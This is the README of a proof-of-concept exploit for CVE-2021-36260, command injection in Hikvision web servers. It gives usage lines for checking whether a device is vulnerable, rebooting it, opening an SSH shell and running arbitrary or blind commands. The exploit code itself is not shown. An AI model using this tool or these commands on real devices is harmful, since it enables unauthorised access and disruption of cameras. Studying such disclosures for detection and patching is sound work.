# CVE-2021-36260
CVE-2021-36260 POC command injection vulnerability in the web server of some Hikvision product. Due to the insufficient input validation, attacker can exploit the vulnerability to launch a command injection attack by sending some messages with malicious commands.

Exploit Title: Hikvision Web Server Build 210702 - Command Injection

Exploit Author: bashis

Vendor Homepage:

Version: 1.0

CVE: CVE-2021-36260


# All credit to Watchful_IP

1)  This code will _not_ verify if remote is Hikvision device or not.
2)  Most of my interest in this code has been concentrated on how to
    reliably detect vulnerable and/or exploitable devices.
    Some devices are easy to detect, verify and exploit the vulnerability,
    other devices may be vulnerable but not so easy to verify and exploit.
    I think the combined verification code should have very high accuracy.
3)  'safe check' (--check) will try write and read for verification
    'unsafe check' (--reboot) will try reboot the device for verification

Safe vulnerability/verify check:
    $./ --rhost --rport 8080 --check

Safe and unsafe vulnerability/verify check:
(will only use 'unsafe check' if not verified with 'safe check')
    $./ --rhost --rport 8080 --check --reboot

Unsafe vulnerability/verify check:
    $./ --rhost --rport 8080 --reboot

Launch and connect to SSH shell:
    $./ --rhost --rport 8080 --shell

Execute command:
    $./ --rhost --rport 8080 --cmd "ls -l"

Execute blind command:
    $./ --rhost --rport 8080 --cmd_blind "reboot"